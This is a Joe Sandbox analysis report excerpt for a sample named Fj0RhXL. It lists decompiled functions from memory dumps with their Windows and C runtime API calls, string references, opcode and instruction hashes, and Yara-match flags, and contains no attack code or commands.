Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: __getptd$CompareString____lc_collate_cp_func____lc_handle_func___crt_memcmp
String ID:
API String ID: 2928985310-0
Opcode ID: ee3c72d4a8a98b572a525827f552e7c8848a8a272a4a8748430edfeb98e83d8a
Instruction ID: f48f7cb6cf7a61a1c81fc4014ba80bf0ff0400b063fb754e1b23b3cedddd5023
Opcode Fuzzy Hash: ee3c72d4a8a98b572a525827f552e7c8848a8a272a4a8748430edfeb98e83d8a
Instruction Fuzzy Hash: 21F0A4776002056AFF21AA59CC49BAE765CDF40650F060253F92D8E058E62288714760

Function 02F04AD0 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(00000001,?,00000001,?,02F03C3F,?,?,00000001), ref: 02F04AE5
InterlockedIncrement.KERNEL32(00000001), ref: 02F04AF4
InterlockedIncrement.KERNEL32(00000001), ref: 02F04B01
timeGetTime.WINMM(?,02F03C3F,?,?,00000001), ref: 02F04B18

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: IncrementInterlockedTimetime
String ID:
API String ID: 159728177-0
Opcode ID: 48725d755c3d83c63c7bd689270eb3e62da8e45a50d5a1dd6f93579d5d575d36
Instruction ID: 961aa20dbd6850b219ff02173da5aa4f042016807cd55a10c8cf371ae141ca99
Opcode Fuzzy Hash: 48725d755c3d83c63c7bd689270eb3e62da8e45a50d5a1dd6f93579d5d575d36
Instruction Fuzzy Hash: FE01DAB5A007099FC760DFAAD88094AFBF9BF58750741892EE649C7610E774E6448FE0

Function 03D83630 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03D83637
_free.LIBCMT ref: 03D8366C

Part of subcall function 03D9AB04: RtlFreeHeap.NTDLL(00000000,00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB1A
Part of subcall function 03D9AB04: GetLastError.KERNEL32(00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000), ref: 03D9AB2C

_malloc.LIBCMT ref: 03D836A7
_memset.LIBCMT ref: 03D836B5

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
String ID:
API String ID: 3340475617-0
Opcode ID: 1fcd75cc0ea2f49dc78cbcb23c3ae0ec1d3ec973c5fa081e7e8d105998a26007
Instruction ID: d31b36f4a9aa09e04bc4bfc61313e799b10bf6f8fc7edb7aba7c2c92d60160c5
Opcode Fuzzy Hash: 1fcd75cc0ea2f49dc78cbcb23c3ae0ec1d3ec973c5fa081e7e8d105998a26007
Instruction Fuzzy Hash: 4501DAF5900B04DFE760DF7A8881B97FAE9EB85358F15482ED5AE87301D634A8048F60

Function 02F03650 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02F03657
_free.LIBCMT ref: 02F0368C

Part of subcall function 02F06F59: RtlFreeHeap.NTDLL(00000000,00000000,?,02F099CF,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F06F6F
Part of subcall function 02F06F59: GetLastError.KERNEL32(00000000,?,02F099CF,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000), ref: 02F06F81

_malloc.LIBCMT ref: 02F036C7
_memset.LIBCMT ref: 02F036D5

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
String ID:
API String ID: 3340475617-0
Opcode ID: c9a3a062697756028e6ff23e9e117e9bb81c626b092a279b7ef7ac7617d4c7be
Instruction ID: bbba2845a97fcdbfb359b441e644aa74330129724d2c595361be38e2a67e630b
Opcode Fuzzy Hash: c9a3a062697756028e6ff23e9e117e9bb81c626b092a279b7ef7ac7617d4c7be
Instruction Fuzzy Hash: 5B01C8B1900B04DFE3609F7A98C1B97BAE9EB85354F10482EE5AEC7341D630A8049F60

Function 032B69F4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 032B6A0E

Part of subcall function 032B6960: __FF_MSGBANNER.LIBCMT ref: 032B6979
Part of subcall function 032B6960: __NMSG_WRITE.LIBCMT ref: 032B6980

std::exception::exception.LIBCMT ref: 032B6A43
std::exception::exception.LIBCMT ref: 032B6A5D
__CxxThrowException@8.LIBCMT ref: 032B6A6E

Memory Dump Source

Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc
String ID:
API String ID: 2388904642-0
Opcode ID: c5dba215bafa20b511687e2302b221ec5ae919bf628af2018c75bf268600f4ea
Instruction ID: 645a63029200b916c727e8329c8be61275ae02adef6587d07c34812de4c5443c
Opcode Fuzzy Hash: c5dba215bafa20b511687e2302b221ec5ae919bf628af2018c75bf268600f4ea
Instruction Fuzzy Hash: 8DF0F435520389AADF10EB94CC80AEDBBFAEB42780F144419E500AE0D1CFF1C9C48B84

Function 03D97A50 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03D81430: HeapFree.KERNEL32(?,00000000,?,?,?,03D84081,?,?,74DEDFA0,03D83618), ref: 03D8144D
Part of subcall function 03D81430: _free.LIBCMT ref: 03D81469

HeapDestroy.KERNEL32(00000000), ref: 03D97A63
HeapCreate.KERNEL32(?,?,?), ref: 03D97A75
_free.LIBCMT ref: 03D97A85
HeapDestroy.KERNEL32 ref: 03D97AB2

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Heap$Destroy_free$CreateFree
String ID:
API String ID: 4097506873-0
Opcode ID: 1edc62280f5361cd23a0eddfc91f6bf083c2a80c15568e19dcaf80ec34db11b3
Instruction ID: a18e328ee41d33053c0076e4d22f66d62d058d11ff561b2ef132d1ae80c67fed
Opcode Fuzzy Hash: 1edc62280f5361cd23a0eddfc91f6bf083c2a80c15568e19dcaf80ec34db11b3
Instruction Fuzzy Hash: E1F03CB6100602DBEB10DF28D808B17F7B8FF40B10F148919E9A9C7344E735E511CBA0

Function 02F06590 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02F01420: HeapFree.KERNEL32(?,00000000,?,?,?,02F040A1,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F0143D
Part of subcall function 02F01420: _free.LIBCMT ref: 02F01459

HeapDestroy.KERNEL32(00000000), ref: 02F065A3
HeapCreate.KERNEL32(?,?,?), ref: 02F065B5
_free.LIBCMT ref: 02F065C5
HeapDestroy.KERNEL32 ref: 02F065F2

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Heap$Destroy_free$CreateFree
String ID:
API String ID: 4097506873-0
Opcode ID: 81aa96420a0f0816b3bf74b39da31ad4a446ea5bfe2ea25acbaa29f7c4b94128
Instruction ID: 9adbdbdcf83190170d5f7e0fcde7fbac0d71e1165f0d8795cf3225e38d1c320d
Opcode Fuzzy Hash: 81aa96420a0f0816b3bf74b39da31ad4a446ea5bfe2ea25acbaa29f7c4b94128
Instruction Fuzzy Hash: 53F019B59007029BD7109F24E948B27FBB9BF84B95F51491CEA59C3280DB34E8619B90

Function 03D819E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

recv sn=%lu, xrefs: 03D81AA6

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID:
String ID: recv sn=%lu
API String ID: 0-1144994348
Opcode ID: 6aa2123e59ff28b843b38d3f9eb7334d3540eeb311f97c9c17753f8081efcdc7
Instruction ID: b3e297c1a72dd25c09bc930a072afe360f3b15b30ad72d8033aafff2c77dd3e0
Opcode Fuzzy Hash: 6aa2123e59ff28b843b38d3f9eb7334d3540eeb311f97c9c17753f8081efcdc7
Instruction Fuzzy Hash: 5F5178756007059FC710EF69C580B9AB7F9FF49720F1486A9D85A8B740E731F94ACB90

Function 6C3CED8A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 6C3CEDFC

Part of subcall function 6C3CD9DD: CreateFontA.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000000,00000000,00000002,00000052,Ariel), ref: 6C3CDA11
Part of subcall function 6C3CD9DD: SelectObject.GDI32(00000000,?), ref: 6C3CDA31
Part of subcall function 6C3CD9DD: GetTextExtentPointW.GDI32(?,00000001,?), ref: 6C3CDA54
Part of subcall function 6C3CD9DD: GetTextColor.GDI32 ref: 6C3CDA60
Part of subcall function 6C3CD9DD: SetTextColor.GDI32 ref: 6C3CDA81
Part of subcall function 6C3CD9DD: SetBkMode.GDI32(00000001), ref: 6C3CDA91
Part of subcall function 6C3CD9DD: TextOutW.GDI32(?,?,?,00000001), ref: 6C3CDAB8
Part of subcall function 6C3CD9DD: SetBkMode.GDI32(?), ref: 6C3CDAC7
Part of subcall function 6C3CD9DD: SetTextColor.GDI32(?), ref: 6C3CDAD2
Part of subcall function 6C3CD9DD: SelectObject.GDI32(?), ref: 6C3CDADD
Part of subcall function 6C3CD9DD: DeleteObject.GDI32(?), ref: 6C3CDAE2

Strings

%d %d(%d)center, xrefs: 6C3CEDF1
HO;l, xrefs: 6C3CEF36, 6C3CEF19, 6C3CEEE1, 6C3CEE62, 6C3CEDEB, 6C3CEDB4, 6C3CEE66

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: Text$ColorObject$ModeSelect$CreateDeleteExtentFontPoint_fprintf
String ID: %d %d(%d)center$HO;l
API String ID: 3349247825-3976141243
Opcode ID: 445de40db52d904f23cdb52802cc4fe1fa4c424cd1d0026e5882750d59d56c4e
Instruction ID: 35e13ff6cfd17cc0904a93faf058901eb8717290db4c604c320fc9a4f8d65c82
Opcode Fuzzy Hash: 445de40db52d904f23cdb52802cc4fe1fa4c424cd1d0026e5882750d59d56c4e
Instruction Fuzzy Hash: 1841F276744314ABDB00BF24C846AAD3B76E75632CF258056F544CAA90E732C9558FD3

Function 6C370F98 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C370FAD

Strings

RR____, xrefs: 6C370FA6, 6C3710FB, 6C371100
-_____, xrefs: 6C370FA1

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf
String ID: -_____$RR____
API String ID: 1467051239-1029923009
Opcode ID: 446a3ddb89507890b8321c6ffe096f24fd5f0d1cf4e29cd95aafb592f9f10d12
Instruction ID: 799f035ff01f5748d9b396e2afb65ccbbc2fe089056a986c8a1c021b42c09501
Opcode Fuzzy Hash: 446a3ddb89507890b8321c6ffe096f24fd5f0d1cf4e29cd95aafb592f9f10d12
Instruction Fuzzy Hash: B841D97231E9D089DF31EA1984F4AFC3AB1575331CF68051EC08986985D75FC489AF3A

Function 03D8A0D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D8A138
_memmove.LIBCMT ref: 03D8A184

Part of subcall function 03D89C70: std::_Xinvalid_argument.LIBCPMT ref: 03D89C8A

Strings

string too long, xrefs: 03D8A133

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 312b93047084d41d13a765e83078fe7f4aa2208b662793a70081f2e25761f108
Instruction ID: 0d7614e9ceaac89199d8571eaf8f4c7d1e0605528ac7887c5ad71b3957881d19
Opcode Fuzzy Hash: 312b93047084d41d13a765e83078fe7f4aa2208b662793a70081f2e25761f108
Instruction Fuzzy Hash: D521A3717047409BE721EB5CAC80A2AF7EEEB91A50B24091BF096CB791D772FC54C3A5

Function 03D8A6D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D8A748
_memmove.LIBCMT ref: 03D8A77B

Part of subcall function 03D8AD20: std::_Xinvalid_argument.LIBCPMT ref: 03D8AD39
Part of subcall function 03D8AD20: std::_Xinvalid_argument.LIBCPMT ref: 03D8AD57
Part of subcall function 03D8AD20: _memmove.LIBCMT ref: 03D8AD9B

Strings

string too long, xrefs: 03D8A743

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 92482fad26a5626dd222f4318c93095c4cffef6d89ce698379f2b1bd40cf46a1
Instruction ID: d0a73dfed07b9244b6a4f57e39f3e29b862a29fb07765b271fcaf626d633f3ef
Opcode Fuzzy Hash: 92482fad26a5626dd222f4318c93095c4cffef6d89ce698379f2b1bd40cf46a1
Instruction Fuzzy Hash: F9217A36301206AF8718EF6CECD0C69B3BAFBC5625354412FE5028B650DB71B955D7A0

Function 03D8A620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D8A634

Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2

_memmove.LIBCMT ref: 03D8A67C

Strings

string too long, xrefs: 03D8A62F

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: 72c207d899263832d81ac1a1d8977f0e5f7c010a7f3885a597b92dc55f55b0d1
Instruction ID: 46322826d7aa2653be820b4024165a0cdecb71664203abfc8493c83f739d072d
Opcode Fuzzy Hash: 72c207d899263832d81ac1a1d8977f0e5f7c010a7f3885a597b92dc55f55b0d1
Instruction Fuzzy Hash: 6A11E672504B109FEB20FF7CA8C1A6FB3DCEF50614F140A2FE09787685D721B44886A4

Function 03D937E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 03D93828
_memmove.LIBCMT ref: 03D93879

Strings

@, xrefs: 03D93854

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: @
API String ID: 4104443479-2766056989
Opcode ID: 08d8ba2eeb2db836fa0e89e9ba6b1369420d555085f22cf98a88c2b66ddd5250
Instruction ID: f258a3291f0985941d22b22ade136bba42ccc2bc0ec3d197b820a5f1a9a9f161
Opcode Fuzzy Hash: 08d8ba2eeb2db836fa0e89e9ba6b1369420d555085f22cf98a88c2b66ddd5250
Instruction Fuzzy Hash: 4D11E9BAA00304AFDB14DF98D8C0AAE73FEEB94204F50056ED5078B601EB74DA05C7A1

Function 032B6AA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

__output_l.LIBCMT ref: 032B6B02

Part of subcall function 032B6BEA: __getptd_noexit.LIBCMT ref: 032B6BEA

Strings

B, xrefs: 032B6AFB

Memory Dump Source

Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd

Similarity

API ID: __getptd_noexit__output_l
String ID: B
API String ID: 2141734944-1255198513
Opcode ID: 8c3024f2d0b3077bcdd9701ae524abb7291b2c069da38e32abac73d6cafc8205
Instruction ID: f32c5ee65f7ddfec9c4a820426f04330df5dc09ccce39e6b54827b7201ffee1f
Opcode Fuzzy Hash: 8c3024f2d0b3077bcdd9701ae524abb7291b2c069da38e32abac73d6cafc8205
Instruction Fuzzy Hash: FD016D75A1024AABDF00DFA4DC00BEEBBB8EB043A4F044159E924BA280E774D581CBA5

Function 03D8A290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D8A29F

Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B19
Part of subcall function 03D99B04: __CxxThrowException@8.LIBCMT ref: 03D99B2E
Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B3F

_memmove.LIBCMT ref: 03D8A2D5

Strings

invalid string position, xrefs: 03D8A29A

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 462349321d65ed0887b6135724028193065cfc33e7c7c8ea66be3d2a8ef04812
Instruction ID: 9019e6a744ca6bb4b5c52d197beb49687fc3d4704bb52918dd2bfe5405d0223a
Opcode Fuzzy Hash: 462349321d65ed0887b6135724028193065cfc33e7c7c8ea66be3d2a8ef04812
Instruction Fuzzy Hash: 14018F317006018FD335EBACE89072AB2E6DBC45047295A2ED182CB749D6B2F95283A0

Function 6C370CB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C370CD8
_sprintf.LIBCMT ref: 6C370CE9

Part of subcall function 6C3D1F84: __output_l.LIBCMT ref: 6C3D1FDF

Strings

%%.%df, xrefs: 6C370CD2

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$__output_l
String ID: %%.%df
API String ID: 1830584065-883532698
Opcode ID: feedece06adc70c401fd8d3c09e5addf924b3a87738e725911755a13f51d5815
Instruction ID: 479b2c097068a527f1ee74c3367358e5db523d5d95d2296ce10321e22114b86b
Opcode Fuzzy Hash: feedece06adc70c401fd8d3c09e5addf924b3a87738e725911755a13f51d5815
Instruction Fuzzy Hash: FB014CB29042C9AFDF16EB34C8405DD7F98DF09208F154499D0818B941CB7AE585CB76

Function 03D8A800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D8A814

Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2

_memmove.LIBCMT ref: 03D8A84D

Strings

vector<T> too long, xrefs: 03D8A80F

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: f45841d72813c4dbdbcbba4e386eccb1fe6127d0bb37611a7cb8548339828f4b
Instruction ID: 8b37786200a13e673dfc445fa5c4185614bdbbad4b9abd7c47bb6b6f3704c520
Opcode Fuzzy Hash: f45841d72813c4dbdbcbba4e386eccb1fe6127d0bb37611a7cb8548339828f4b
Instruction Fuzzy Hash: 0401B5B7E602079BD705FF7EE8A586A73F8E6C1614385063AE905D7308E674B805C6F0

Function 03D97DA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D97DB4

Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2

_memmove.LIBCMT ref: 03D97DED

Strings

vector<T> too long, xrefs: 03D97DAF

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: fa0ab789c0faefd50769a7e9ead0a52b1a0e82e3f85c617b47e203f4d57f9014
Instruction ID: e9f4e849f8395176d05ab5e754d9ac8933e4e701626bb46e8aed19d26a92d213
Opcode Fuzzy Hash: fa0ab789c0faefd50769a7e9ead0a52b1a0e82e3f85c617b47e203f4d57f9014
Instruction Fuzzy Hash: 6E01D177E702039FD716FE7EE8A187A73F8E6C45253C5022BE805C7309E674A804C6A0

Function 03D8AAF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 03D8AB03

Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
